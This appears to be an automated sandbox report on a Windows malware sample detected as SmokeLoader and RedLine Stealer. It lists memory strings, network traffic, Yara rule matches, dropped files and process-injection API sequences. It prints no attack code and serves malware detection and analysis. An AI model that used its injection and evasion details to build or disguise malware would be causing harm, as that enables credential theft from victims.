Source: explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com
Source: explorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.come
Source: explorer.exe, 00000002.00000000.2166104527.000000000BFEF000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comEMd
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 0000000C.00000003.3154032054.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3157844418.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3138931305.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3141625992.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3135741623.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3137764604.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3145313076.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3133714532.0000000008B2D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 00000002.00000000.2166104527.000000000C048000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.comM
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/10-things-rich-people-never-buy-and-you-shouldn-t-ei
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/money-matters-changing-institution-of-marriage/ar-AA
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/savingandinvesting/americans-average-net-worth-by-age/ar-AA1h4ngF
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/republicans-already-barred-trump-from-being-speaker-of-the-h
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/trump-campaign-says-he-raised-more-than-45-million-in-3rd-qu
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/technology/a-federal-emergency-alert-will-be-sent-to-us-phones-nation
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/biden-administration-waives-26-federal-laws-to-allow-border-wall-c
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/us-supplies-ukraine-with-a-million-rounds-of-ammunition-seized-
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/travel/news/you-can-t-beat-bobby-flay-s-phoenix-airport-restaurant-one-of-
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/california-s-reservoirs-runneth-over-in-astounding-reve
Source: explorer.exe, 00000002.00000000.2160563732.00000000073E5000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3094588061.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3099530008.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3359137352.0000000007B7D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe.6.dr, 9A25.exe.2.dr	String found in binary or memory: https://www.ssl.com/repository0
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.html
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: https://www.x-ways.net/forensics/x-tensions.htmlf
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: https://www.x-ways.net/winhex/forum/
Source: 9A25.exe, 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, svchost015.exe, 00000007.00000000.2788168210.0000000000401000.00000020.00000001.01000000.00000007.sdmp, svchost015.exe.6.dr	String found in binary or memory: https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443

Source: unknown

HTTPS traffic detected: 84.32.84.152:443 -> 192.168.2.6:49744 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: Yara match	File source: 7.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.2794045093.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9A25.exe PID: 3500, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: svchost015.exe PID: 6812, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: Semi-Auto-generated - file ironshell.php.txt Author: Neo23x0 Yara BRG + customization by Stefan -dfate- Molls

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00402F55 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F55
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401493
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401476
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014D5
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AA
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014AD
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014B1
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_004030B2 NtTerminateProcess,	0_2_004030B2
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00402F55 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F55
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00401493 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401493
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00401476 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401476
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_004014D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014D5
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_004014AA NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014AA
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_004014AD NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014AD
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_004014B1 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014B1
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_004030B2 NtTerminateProcess,	4_2_004030B2
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Code function: 6_2_0301A090 NtAllocateVirtualMemory,CreateFileA,WriteFile,FindCloseChangeNotification,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,	6_2_0301A090
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Code function: 6_2_030196B0 NtProtectVirtualMemory,NtProtectVirtualMemory,	6_2_030196B0
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Code function: 6_2_030193F0 NtCreateFile,CreateFileMappingA,MapViewOfFile,FindCloseChangeNotification,	6_2_030193F0

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401C5E	0_2_00401C5E
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_00401C0A	0_2_00401C0A
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1C71	0_2_007A1C71
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A154D	0_2_007A154D
Source: C:\Users\user\Desktop\oZB7n3wuNk.exe	Code function: 0_2_007A1CC5	0_2_007A1CC5
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00401C5E	4_2_00401C5E
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00401C0A	4_2_00401C0A
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00671C71	4_2_00671C71
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_0067154D	4_2_0067154D
Source: C:\Users\user\AppData\Roaming\birajci	Code function: 4_2_00671CC5	4_2_00671CC5
Source: C:\Users\user\AppData\Local\Temp\9A25.exe	Code function: 6_2_0301A700	6_2_0301A700

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\9A25.exe 681EEECECD77EB1433111641C33C8424EAF2C1265E2D4A7E4D6F023865FB5D94
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Temp\svchost015.exe 7824B50ACDD144764DAC7445A4067B35CF0FEF619E451045AB6C1F54F5653A5B

Source: C:\Windows\explorer.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4004 -s 9264

Source: oZB7n3wuNk.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000004.00000002.2404618518.00000000006E8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2179135216.00000000007A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2179023216.0000000000638000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.2179176948.00000000007C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2404904478.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000000.00000002.2179285739.0000000002261000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2404842660.0000000002240000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
Source: 00000004.00000002.2404360688.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: Process Memory Space: explorer.exe PID: 4004, type: MEMORYSTR	Matched rule: ironshell_php author = Neo23x0 Yara BRG + customization by Stefan -dfate- Molls, description = Semi-Auto-generated - file ironshell.php.txt, hash = 8bfa2eeb8a3ff6afc619258e39fded56

Source: oZB7n3wuNk.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: birajci.2.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: svchost015.exe.6.dr	Binary string: \Device\CDROM
Source: svchost015.exe.6.dr	Binary string: \Device\PhysicalMemory
Source: svchost015.exe.6.dr	Binary string: \Device\PhysicalMemoryU
Source: svchost015.exe.6.dr	Binary string: ol, por favorI&taliano, per favore&Portugues, por favorPo&lski..prj.xfcwhxvmem.pos.settings.zip.e01.dd001.ctr.txt.png.mem.memservice_workeredgetmp.tmpemlmsg.jpgheic.pdf;.ps;.tif;.jpg;.png;.gif;.bmp.htmlhtmlxmlsqlitesqlitedbregistryolk14messageedbsnssevtevtxplistbplist.xhdTesseractOCRExcireExcire ForensicsExcire.exe.\!imagespst,ost,edb,dbx,pfc,mbox,eml,emlx,mht,mim,msg,olk14msgsource,olk14message,olk14msgattach,olk15msgattach,olk15msgsource,olk15message,oft,mbs,tnefzip,zipx,7z,rar,tar,gz,tgz,bzip,bz2docx,xlsx,pptx,ppsx,odt,ods,odb,odg,odf,odp,key,numbers,pages,xps,oxps,opendoc,sxw,sxg,sxc,stc,sxm,sxi,sxd,std,stw,sxm,hwpxufdr,ova,gbp,odm,a2w,kmz,kpr,pxl2,bbb,idml,cdr,sbb,notebook,mmap,spd,cdmz,mwb,nbak,pez,artx,cmap,sh3d,dpp,snb,dbk,sps,spv,wpp,jnxthmx,war,otp,xap,dwfx,epub,btapp,u3p,nth,ibooks,3dxml,htmlz,cbz,ear,potx,ppam,xltx,xlsm,dotx,docm,dotx,vsdx,gadget,rbf,eftx,gg,ottjar,apk,ipa,appx,crx,cabzxp,ots,wmz,air,accft,vssx,ipcc,ipsw,xpi;.docx;.pptx;.xlsx;.vsdx;.vsdm;.odt;.odp;.ods.xls;.xlsx;.odsNEARNTNRFlexFilterANDOR (=offline)XWF_MTX_Alt Gr +Ctrl +Shift +Space +Ctrl+Alt +HeaderBlank line(s) found.Power down after x minutesFallback code page for plain text\\\\?\\\.\\\?\Volume{\Device\HarddiskVolume\Device\CdRom... .. FILEBAAD($MFT) WofCompressedDataIndex Record$EFS.PFILENTFS: EA(EA)NO NAME > 0x100x10 < 0x30Unable to terminate worker thread.X-Ways Decompressed [block hash values] [PhotoDNA] [FuzZyDoc]PhotoDNAFuzZyDoc_newTeamsMessagesDataTeamsMeetingsRecoverable Items\DeletionsTop of Personal FoldersSenRec.dirPasswords.txtSearch Terms.txtNewUsers.dirKeywordsLockSpecial Interest.sectorX-Ways SessionSleep(0) Frequency (0..100)non-existent sector debug info123123\|123\|1234\|12345\|123456\|1234567\|12345678\|123456789\|987654321\|abc123\|123abc\|121212\|000000\|666666\|qwerty\|password\|password1\|iloveyou\|monkey\|dragon\|qwertyuiop-------- * ---* ***nLicID& --> --> .journal.exclude.badblocksFile mode:Sequential #TOCBLOCKVMDBVBLKContainerFILETIMEZone.Identifier[ZoneTransfer]System Volume InformationNot enough space for metadata at offset<html>
Source: svchost015.exe.6.dr	Binary string: \Device\harddisk
Source: svchost015.exe.6.dr	Binary string: \Device\Floppy
Source: svchost015.exe.6.dr	Binary string: \Device\Floppy\Device\CDROM\Device\harddisk\partition0SQ

Source: classification engine

Classification label: mal100.troj.evad.winEXE@8/11@3/3

Source: C:\Users\user\Desktop\oZB7n3wuNk.exe

Code function: 0_2_0064AC68 CreateToolhelp32Snapshot,Module32First,

0_2_0064AC68

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\birajci

Jump to behavior

Source: C:\Windows\System32\WerFault.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4004

Source: C:\Windows\explorer.exe

